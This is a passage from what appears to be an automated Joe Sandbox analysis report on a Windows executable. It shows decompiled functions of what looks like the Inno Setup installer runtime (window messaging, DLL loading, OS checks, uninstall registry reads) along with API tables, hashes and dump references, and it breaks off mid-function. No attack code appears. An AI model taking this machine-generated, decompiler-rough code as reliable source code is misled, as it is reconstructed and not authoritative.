									_t181 = E004465D4(_t219, _t220, _t372 - 4, __fp0);
									_t183 = E004465D4(_t219, _t220, _t372 - 3, __fp0);
									_t185 = E004465D4(_t219, _t220, _t372 - 2, __fp0);
									_t188 = PostMessageA(E004465D4(_t219, _t220, _t372 - 1, __fp0), _t185, _t183, _t181);
									asm("sbb ecx, ecx");
									E00446708(_t219,  ~( ~_t188), _t372, _t374, __fp0);
								}
							} else {
								_t192 = E004465D4(_t219, _t220, _t372 - 4, __fp0);
								_t194 = E004465D4(_t219, _t220, _t372 - 3, __fp0);
								_t196 = E004465D4(_t219, _t220, _t372 - 2, __fp0);
								E004468B0(_t219, SendMessageA(E004465D4(_t219, _t220, _t372 - 1, __fp0), _t196, _t194, _t192), _t372, _t374, __fp0);
							}
						} else {
							E00446630(_t219,  &_v16, _t372 - 1, __edx);
							_t206 = FindWindowA(0, E00403738(_v16)); // executed
							E004468B0(_t219, _t206, _t372, _t374, __fp0);
						}
					} else {
						E00446630(_t219,  &_v16, _t372 - 1, __edx);
						E004468B0(_t219, FindWindowA(E00403738(_v16), 0), _t372, _t374, __fp0);
					}
				} else {
					Sleep(E004465D4(_t219, _t220, _t372, __fp0));
				}
				_pop(_t276);
				 *[fs:eax] = _t276;
				_push(0x490f50);
				return E00403420( &_v16, 2);
			}

0x00490a54
0x00490a54
0x00490a55
0x00490a57
0x00490a59
0x00490a5b
0x00490a5d
0x00490a62
0x00490a67
0x00490a68
0x00490a6d
0x00490a70
0x00490a76
0x00490a77
0x00490a83
0x00490a88
0x00490aa6
0x00490aab
0x00490ae2
0x00490ae7
0x00490b1e
0x00490b23
0x00490b74
0x00490b79
0x00490bd0
0x00490bd5
0x00490c2c
0x00490c31
0x00490c66
0x00490c6b
0x00490cb4
0x00490cb9
0x00490d08
0x00490d0d
0x00490d5c
0x00490d61
0x00490dbe
0x00490dc3
0x00490e45
0x00490e4a
0x00490e7a
0x00490e7f
0x00490eac
0x00490eb1
0x00490eef
0x00490ef4
0x00490f2a
0x00490ef6
0x00490efd
0x00490f05
0x00490f17
0x00490f23
0x00490f23
0x00490eb3
0x00490eba
0x00490ec2
0x00490ed4
0x00490ee0
0x00490ee0
0x00490e81
0x00490e88
0x00490e9a
0x00490e9a
0x00490e4c
0x00490e57
0x00490e60
0x00490e68
0x00490e68
0x00490dc5
0x00490dcf
0x00490dd7
0x00490ded
0x00490def
0x00490df1
0x00490e33
0x00490df3
0x00490e18
0x00490e23
0x00490e23
0x00490df1
0x00490d63
0x00490d6b
0x00490d7d
0x00490d7f
0x00490d81
0x00490d93
0x00490d9c
0x00490da1
0x00490d83
0x00490d8c
0x00490d8c
0x00490dac
0x00490dac
0x00490d0f
0x00490d16
0x00490d23
0x00490d39
0x00490d42
0x00490d4a
0x00490d4a
0x00490cbb
0x00490cc2
0x00490ccf
0x00490ce5
0x00490cee
0x00490cf6
0x00490cf6
0x00490c6d
0x00490c74
0x00490c81
0x00490ca2
0x00490ca2
0x00490c33
0x00490c3b
0x00490c54
0x00490c54
0x00490bd7
0x00490bde
0x00490beb
0x00490bf8
0x00490c09
0x00490c12
0x00490c1a
0x00490c1a
0x00490b7b
0x00490b82
0x00490b8f
0x00490b9c
0x00490bad
0x00490bb6
0x00490bbe
0x00490bbe
0x00490b25
0x00490b2c
0x00490b39
0x00490b46
0x00490b62
0x00490b62
0x00490ae9
0x00490af1
0x00490b01
0x00490b0c
0x00490b0c
0x00490aad
0x00490ab7
0x00490ad0
0x00490ad0
0x00490a8a
0x00490a94
0x00490a94
0x00490f30
0x00490f33
0x00490f36
0x00490f48

APIs

Sleep.KERNEL32(00000000,00000000,00490F49,?,?,?,?,00000000,00000000,00000000), ref: 00490A94
FindWindowA.USER32 ref: 00490AC5

Strings

FINDWINDOWBYWINDOWNAME, xrefs: 00490ADD
SLEEP, xrefs: 00490A7E
REGISTERWINDOWMESSAGE, xrefs: 00490C27
FINDWINDOWBYCLASSNAME, xrefs: 00490AA1
POSTMESSAGE, xrefs: 00490B6F
SENDBROADCASTNOTIFYMESSAGE, xrefs: 00490D03
POSTBROADCASTMESSAGE, xrefs: 00490CAF
OEMTOCHARBUFF, xrefs: 00490EA7
CALLDLLPROC, xrefs: 00490DB9
SENDBROADCASTMESSAGE, xrefs: 00490C61
SENDMESSAGE, xrefs: 00490B19
FREEDLL, xrefs: 00490E40
LOADDLL, xrefs: 00490D57
CHARTOOEMBUFF, xrefs: 00490EEA
CREATEMUTEX, xrefs: 00490E75
SENDNOTIFYMESSAGE, xrefs: 00490BCB

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FindSleepWindow
String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
API String ID: 3078808852-3310373309
Opcode ID: 5a181f7a78a81a25524bb9ccff1a77024fd5f8f309e49659301eb84ce297f7dd
Instruction ID: 94243f457067d3c55b7586398a2c7c315ae52e177f30388f962aed21f228438e
Opcode Fuzzy Hash: 5a181f7a78a81a25524bb9ccff1a77024fd5f8f309e49659301eb84ce297f7dd
Instruction Fuzzy Hash: 91C1C560B002116BDB14BF7E9C4251E6A999F88708B22D93FB446DB78ECD7CDD06439E

Uniqueness

Uniqueness Score: -1.00%

Function 004819B8 Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E004819B8() {
				struct _SYSTEM_INFO _v44;
				_Unknown_base(*)()* _t5;
				void* _t8;
				void* _t9;
				void* _t10;
				struct HINSTANCE__* _t19;
				intOrPtr* _t21;
				intOrPtr* _t22;

				 *0x49b370 = 0;
				_t19 = GetModuleHandleA("kernel32.dll");
				_t5 = GetProcAddress(_t19, "GetNativeSystemInfo");
				if(_t5 == 0) {
					GetSystemInfo( &_v44);
				} else {
					 *_t5( &_v44); // executed
					_t21 = GetProcAddress(_t19, "IsWow64Process");
					if(_t21 != 0) {
						_push(_t22);
						_push(GetCurrentProcess());
						if( *_t21() != 0 &&  *_t22 != 0 && E00451A7C() != 0 && GetProcAddress(_t19, "GetSystemWow64DirectoryA") != 0 && GetProcAddress(GetModuleHandleA("advapi32.dll"), "RegDeleteKeyExA") != 0) {
							 *0x49b370 = 1;
						}
					}
				}
				_t8 = _v44.dwOemId - 1;
				if(_t8 < 0) {
					 *0x498c40 = 1;
					return _t8;
				} else {
					_t9 = _t8 - 5;
					if(_t9 == 0) {
						 *0x498c40 = 3;
						return _t9;
					}
					_t10 = _t9 - 3;
					if(_t10 == 0) {
						 *0x498c40 = 2;
						return _t10;
					}
					 *0x498c40 = 0;
					return _t10;
				}
			}

0x004819bd
0x004819ce
0x004819d6
0x004819dd
0x00481a49
0x004819df
0x004819e4
0x004819f1
0x004819f5
0x004819f7
0x004819fd
0x00481a02
0x00481a3b
0x00481a3b
0x00481a02
0x004819f5
0x00481a53
0x00481a57
0x00481a67
0x00000000
0x00481a59
0x00481a59
0x00481a5d
0x00481a70
0x00000000
0x00481a70
0x00481a5f
0x00481a63
0x00481a79
0x00000000
0x00481a79
0x00481a82
0x00000000
0x00481a82

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004819C9
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004819D6
GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004819E4
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004819EC
GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 004819F8
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00481A19
GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00481A2C
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00481A32
GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481A49

Strings

kernel32.dll, xrefs: 004819C4
GetSystemWow64DirectoryA, xrefs: 00481A13
RegDeleteKeyExA, xrefs: 00481A22
GetNativeSystemInfo, xrefs: 004819D0
IsWow64Process, xrefs: 004819E6
advapi32.dll, xrefs: 00481A27

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
API String ID: 2230631259-2623177817
Opcode ID: 876f0f96911b2155ec2c637b7095e85613407d3f2e07980d36d1cfcd4d2b8784
Instruction ID: 4b6e60da2e63d5ee5466c30daea27ccdf7ca07a74b6e8e0bcf11b47dc41d32c9
Opcode Fuzzy Hash: 876f0f96911b2155ec2c637b7095e85613407d3f2e07980d36d1cfcd4d2b8784
Instruction Fuzzy Hash: A5118E91207741A5DA29B3B5DD86B7F254C8B01758F080D3BA881A62B3DB7C8887976E

Uniqueness

Uniqueness Score: -1.00%

Function 00468124 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00468124(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char* _v40;
				intOrPtr _t62;
				void* _t76;
				intOrPtr _t77;
				void* _t78;
				void* _t90;
				void* _t92;
				void* _t100;
				void* _t102;
				intOrPtr* _t114;
				intOrPtr _t134;
				intOrPtr _t139;
				void* _t156;
				void* _t158;
				void* _t160;
				void* _t161;
				intOrPtr _t162;

				_t160 = _t161;
				_t162 = _t161 + 0xffffffdc;
				_v24 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				_t158 = __eax;
				_push(_t160);
				_push(0x468359);
				_push( *[fs:eax]);
				 *[fs:eax] = _t162;
				_t62 =  *0x49b174; // 0x2278c64
				E0047AA00(_t62, __ecx,  &_v16);
				if(_v16 == 0) {
					L22:
					__eflags = 0;
					_pop(_t134);
					 *[fs:eax] = _t134;
					_push(E00468360);
					return E00403420( &_v24, 4);
				} else {
					E00477544(_v16, __ecx,  &_v20);
					_t156 = 2;
					_t114 = 0x498b40;
					while(1) {
						_v40 = "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall";
						_v36 = 0xb;
						_v32 = _v20;
						_v28 = 0xb;
						E004078D4("%s\\%s_is1", 1,  &_v40,  &_v24);
						_t76 = E00403738(_v24);
						_t77 =  *0x498c3c; // 0x1, executed
						_t78 = E0042DD1C(_t77, _t76,  *_t114,  &_v8, 1, 0); // executed
						if(_t78 == 0) {
							_push(_t160);
							_push(0x46832d);
							_push( *[fs:eax]);
							 *[fs:eax] = _t162;
							if(( *0x49b29b & 0x00000040) != 0) {
								E0042DC4C();
							}
							break;
						}
						_t114 = _t114 + 4;
						_t156 = _t156 - 1;
						__eflags = _t156;
						if(_t156 != 0) {
							continue;
						} else {
							goto L22;
						}
						goto L23;
					}
					if(( *0x49b29c & 0x00000001) != 0) {
						E0042DC4C();
						if(E0042DC64(_v8, "Inno Setup: No Icons") != 0) {
							 *((char*)(_t158 + 0x31c)) = 1;
						}
					}
					if(( *0x49b29c & 0x00000004) != 0) {
						E0042DC4C();
						_t100 = E0042DC4C();
						_t169 = _t100;
						if(_t100 != 0) {
							E004781D0( *((intOrPtr*)(_t158 + 0x320)), _t114, _v12, _t156, _t158, _t169);
						}
						_t102 = E0042DC4C();
						_t170 = _t102;
						if(_t102 != 0) {
							E004781D0( *((intOrPtr*)(_t158 + 0x324)), _t114, _v12, _t156, _t158, _t170);
						}
					}
					if(( *0x49b29c & 0x00000080) != 0) {
						_t90 = E0042DC4C();
						_t172 = _t90;
						if(_t90 != 0) {
							E004781D0( *((intOrPtr*)(_t158 + 0x328)), _t114, _v12, _t156, _t158, _t172);
						}
						_t92 = E0042DC4C();
						_t173 = _t92;
						if(_t92 != 0) {
							E004781D0( *((intOrPtr*)(_t158 + 0x32c)), _t114, _v12, _t156, _t158, _t173);
						}
					}
					if(( *0x49b29d & 0x00000020) != 0) {
						E0042DC4C();
						E0042DC4C();
						E0042DC4C();
					}
					_pop(_t139);
					 *[fs:eax] = _t139;
					_push(E0046833E);
					return RegCloseKey(_v8);
				}
				L23:
			}

0x00468125
0x00468127
0x0046812f
0x00468132
0x00468135
0x00468138
0x0046813b
0x0046813f
0x00468140
0x00468145
0x00468148
0x0046814e
0x00468153
0x0046815c
0x0046833e
0x0046833e
0x00468340
0x00468343
0x00468346
0x00468358
0x00468162
0x00468168
0x0046816d
0x00468172
0x00468177
0x00468188
0x0046818b
0x00468192
0x00468195
0x004681a6
0x004681ae
0x004681b7
0x004681bc
0x004681c3
0x004681cb
0x004681cc
0x004681d1
0x004681d4
0x004681de
0x004681ee
0x004681ee
0x00000000
0x004681de
0x00468334
0x00468337
0x00468337
0x00468338
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00468338
0x004681fa
0x0046820a
0x0046821e
0x00468220
0x00468220
0x0046821e
0x0046822e
0x0046823e
0x0046824e
0x00468253
0x00468255
0x00468260
0x00468260
0x00468270
0x00468275
0x00468277
0x00468282
0x00468282
0x00468277
0x0046828e
0x0046829b
0x004682a0
0x004682a2
0x004682ad
0x004682ad
0x004682bd
0x004682c2
0x004682c4
0x004682cf
0x004682cf
0x004682c4
0x004682db
0x004682eb
0x004682fe
0x00468311
0x00468311
0x00468318
0x0046831b
0x0046831e
0x0046832c
0x0046832c
0x00000000

APIs

Part of subcall function 0042DD1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481B1F,?,00000001,?,?,00481B1F,?,00000001,00000000), ref: 0042DD38

RegCloseKey.ADVAPI32(?,0046833E,?,?,00000001,00000000,00000000,00468359,?,00000000,00000000,?), ref: 00468327

Strings

Inno Setup: Deselected Tasks, xrefs: 004682B5
%s\%s_is1, xrefs: 004681A1
Inno Setup: Selected Components, xrefs: 00468246
Inno Setup: No Icons, xrefs: 0046820F
Inno Setup: Setup Type, xrefs: 00468236
Inno Setup: Deselected Components, xrefs: 00468268
Inno Setup: Selected Tasks, xrefs: 00468293
Inno Setup: App Path, xrefs: 004681E6
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468183
Inno Setup: Icon Group, xrefs: 00468202
Inno Setup: User Info: Name, xrefs: 004682E3
Inno Setup: User Info: Organization, xrefs: 004682F6
Inno Setup: User Info: Serial, xrefs: 00468309

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseOpen
String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 47109696-1093091907
Opcode ID: 0ce3fab056b6725435d177769cd05c2afc43a6d329bbecae6a04e664139654c2
Instruction ID: 780feb3c2bf2a07cedd5398940266cdb5b5b10f1b13eacb4be7f2e028df3ed8d
Opcode Fuzzy Hash: 0ce3fab056b6725435d177769cd05c2afc43a6d329bbecae6a04e664139654c2
Instruction Fuzzy Hash: D651C330A006489BCB14DB65D951BDEB7F4EF48304F9081AEE844A7395EF78AE01CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042385C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E0042385C(int __eax, void* __edi, void* __esi) {
				void* __ebx;
				int _t12;
				long _t13;
				CHAR* _t14;
				struct HINSTANCE__* _t15;
				signed int _t17;
				signed int _t18;
				signed int _t20;
				struct HINSTANCE__* _t21;
				void* _t23;
				CHAR* _t24;
				struct HWND__* _t25;
				long _t38;
				struct HINSTANCE__* _t41;
				int _t45;
				struct HMENU__* _t46;
				struct _WNDCLASSA* _t54;
				short _t57;

				_t12 = __eax;
				_t45 = __eax;
				if( *((char*)(__eax + 0x7e)) != 0) {
					L12:
					return _t12;
				}
				_t13 = E0041F3AC(E00423BF4, __eax); // executed
				 *(_t45 + 0x24) = _t13;
				_t14 =  *0x498654; // 0x423664
				_t15 =  *0x49a014; // 0x400000
				if(GetClassInfoA(_t15, _t14, _t54) == 0) {
					_t41 =  *0x49a014; // 0x400000
					 *0x498640 = _t41;
					_t57 = RegisterClassA(0x498630);
					if(_t57 == 0) {
						E00408C9C(_t45, 0xf02c, 1, __edi, __esi);
						E0040311C();
					}
				}
				_t17 = GetSystemMetrics(0); // executed
				_t18 = _t17 >> 1;
				if(_t57 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t18);
				_t20 = GetSystemMetrics(1) >> 1;
				if(_t57 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t20);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t21 =  *0x49a014; // 0x400000
				_push(_t21);
				_push(0);
				_t3 = _t45 + 0x6c; // 0x20040
				_t23 = E00403738( *_t3);
				_t24 =  *0x498654; // 0x423664, executed
				_t25 = E00406300(_t24, 0x94ca0000, _t23); // executed
				 *(_t45 + 0x20) = _t25;
				_t5 = _t45 + 0x6c; // 0x41edf8
				E00403400(_t5);
				 *((char*)(_t45 + 0x7e)) = 1;
				_t7 = _t45 + 0x20; // 0x410638
				E00423634( *_t7, 9, _t57);
				_t8 = _t45 + 0x24; // 0x423674
				_t9 = _t45 + 0x20; // 0x410638
				SetWindowLongA( *_t9, 0xfffffffc,  *_t8);
				if( *0x49a5c4 != 0) {
					_t38 = E00424160(_t45);
					_t10 = _t45 + 0x20; // 0x410638
					SendMessageA( *_t10, 0x80, 1, _t38); // executed
				}
				_t11 = _t45 + 0x20; // 0x410638
				_t46 = GetSystemMenu( *_t11, 0);
				DeleteMenu(_t46, 0xf030, 0);
				_t12 = DeleteMenu(_t46, 0xf000, 0);
				if( *0x49a5c4 == 0) {
					goto L12;
				} else {
					return DeleteMenu(_t46, 0xf010, 0);
				}
			}

0x0042385c
0x00423860
0x00423866
0x00423993
0x00423993
0x00423993
0x00423872
0x00423877
0x0042387b
0x00423881
0x0042388e
0x00423890
0x00423895
0x004238a4
0x004238a7
0x004238b5
0x004238ba
0x004238ba
0x004238a7
0x004238c1
0x004238c6
0x004238c8
0x004238ca
0x004238ca
0x004238cd
0x004238d5
0x004238d7
0x004238d9
0x004238d9
0x004238dc
0x004238dd
0x004238df
0x004238e1
0x004238e3
0x004238e5
0x004238ea
0x004238eb
0x004238ed
0x004238f0
0x004238fc
0x00423901
0x00423906
0x00423909
0x0042390c
0x00423911
0x0042391a
0x0042391d
0x00423922
0x00423928
0x0042392c
0x00423938
0x0042393c
0x00423949
0x0042394d
0x0042394d
0x00423954
0x0042395d
0x00423967
0x00423974
0x00423980
0x00000000
0x00423982
0x00000000
0x0042398a

APIs

Part of subcall function 0041F3AC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED8C,?,00423877,00423BF4,0041ED8C), ref: 0041F3CA

GetClassInfoA.USER32 ref: 00423887
RegisterClassA.USER32 ref: 0042389F
GetSystemMetrics.USER32 ref: 004238C1
GetSystemMetrics.USER32 ref: 004238D0
SetWindowLongA.USER32 ref: 0042392C
SendMessageA.USER32 ref: 0042394D
GetSystemMenu.USER32(00410638,00000000,00410638,000000FC,00423674,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00400000), ref: 00423958
DeleteMenu.USER32(00000000,0000F030,00000000,00410638,00000000,00410638,000000FC,00423674,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00423967
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410638,00000000,00410638,000000FC,00423674,00000000,00400000,00000000,00000000,00000000), ref: 00423974
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410638,00000000,00410638,000000FC,00423674,00000000,00400000), ref: 0042398A

Strings

d6B, xrefs: 0042387B, 004238FC

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
String ID: d6B
API String ID: 183575631-2706443047
Opcode ID: 1a24900503b8733379aea5cfaf9f5861154de4ed4614482ecfc179095e4f09fc
Instruction ID: cb7d742b039766248efa62eeae83ada6c81bf6affbfd7cdfcdae993939f2db78
Opcode Fuzzy Hash: 1a24900503b8733379aea5cfaf9f5861154de4ed4614482ecfc179095e4f09fc
Instruction Fuzzy Hash: AF3173B17402106AFB10BF659C86F6B36A8AB15708F10017BFA41EE2D7CABDED44476D

Uniqueness

Uniqueness Score: -1.00%

Function 0047B4A0 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0047B4A0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _t32;
				void* _t39;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t47;
				_Unknown_base(*)()* _t71;
				intOrPtr _t83;
				void* _t90;
				void* _t92;

				_t92 = __eflags;
				_t87 = __esi;
				_t86 = __edi;
				_t70 = __ebx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v28 = 0;
				_v8 = 0;
				_push(_t90);
				_push(0x47b5db);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90 + 0xffffffe0;
				_t32 =  *0x49b120; // 0x22900c8
				E0042C3E4(_t32,  &_v28);
				E004035C0( &_v8, "_isetup\\_shfoldr.dll", _v28);
				E0047B11C("SHFOLDERDLL", __ebx, _v8, __edi, __esi, _t92); // executed
				_t39 = E00451938( &_v24);
				_t93 = _t39;
				if(_t39 == 0) {
					E004526A4("Failed to get version numbers of _shfoldr.dll", _t70, _t86, _t87, _t93);
				}
				if(E00451938( &_v16) == 0 || _v16 <= _v24 && (_v16 != _v24 || _v12 <= _v20)) {
					if(_v16 == _v24 && _v12 == _v20) {
						goto L8;
					}
				} else {
					L8:
					E00403494( &_v8, "shfolder.dll");
				}
				E0042E294("shell32.dll", _t70, 0x8000); // executed
				_t46 = E0042E294(_v8, _t70, 0x8000); // executed
				 *0x49b42c = _t46;
				if( *0x49b42c == 0) {
					_v36 = _v8;
					_v32 = 0xb;
					E004078D4("Failed to load DLL \"%s\"", 0,  &_v36,  &_v28);
					E004526A4(_v28, _t70, _t86, _t87, 0);
				}
				_t47 =  *0x49b42c; // 0x73900000
				_t71 = GetProcAddress(_t47, "SHGetFolderPathA");
				 *0x49b430 = _t71;
				_t102 = _t71;
				if(_t71 == 0) {
					E004526A4("Failed to get address of SHGetFolderPath function", _t71, _t86, _t87, _t102);
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(E0047B5E2);
				E00403400( &_v28);
				return E00403400( &_v8);
			}

0x0047b4a0
0x0047b4a0
0x0047b4a0
0x0047b4a0
0x0047b4a6
0x0047b4a7
0x0047b4a8
0x0047b4ab
0x0047b4ae
0x0047b4b3
0x0047b4b4
0x0047b4b9
0x0047b4bc
0x0047b4c2
0x0047b4c7
0x0047b4d7
0x0047b4e4
0x0047b4ef
0x0047b4f4
0x0047b4f6
0x0047b4fd
0x0047b4fd
0x0047b511
0x0047b531
0x00000000
0x00000000
0x0047b53b
0x0047b53b
0x0047b543
0x0047b543
0x0047b552
0x0047b55f
0x0047b564
0x0047b570
0x0047b579
0x0047b57c
0x0047b58a
0x0047b592
0x0047b592
0x0047b59c
0x0047b5a7
0x0047b5a9
0x0047b5af
0x0047b5b1
0x0047b5b8
0x0047b5b8
0x0047b5bf
0x0047b5c2
0x0047b5c5
0x0047b5cd
0x0047b5da

APIs

GetProcAddress.KERNEL32(73900000,SHGetFolderPathA), ref: 0047B5A2

Strings

shfolder.dll, xrefs: 0047B505, 0047B53E
SHFOLDERDLL, xrefs: 0047B4DF
_isetup\_shfoldr.dll, xrefs: 0047B4D2
Failed to get address of SHGetFolderPath function, xrefs: 0047B5B3
Failed to load DLL "%s", xrefs: 0047B585
Failed to get version numbers of _shfoldr.dll, xrefs: 0047B4F8
shell32.dll, xrefs: 0047B54D
SHGetFolderPathA, xrefs: 0047B597

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
API String ID: 190572456-1343262939
Opcode ID: 8e0308cfa25b368c63260f1a0e1665ef18aa563d5564f12ab9c14ad511b4f7f7
Instruction ID: 2beef7cb76df1c2f8f4163d0aee4f597e84d188aed78b709f669c7c3d938f928
Opcode Fuzzy Hash: 8e0308cfa25b368c63260f1a0e1665ef18aa563d5564f12ab9c14ad511b4f7f7
Instruction Fuzzy Hash: 8231DF70A00149EBCB00EBA5D981ADEB7B5EB58308F508577E504E7351D7389E05DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0047B174 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0047B174(long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _t46;
				int _t52;
				intOrPtr _t85;
				void* _t88;
				intOrPtr _t100;
				intOrPtr _t105;
				intOrPtr _t118;
				intOrPtr _t119;

				_t116 = __esi;
				_t115 = __edi;
				_t87 = __ebx;
				_t118 = _t119;
				_t88 = 5;
				do {
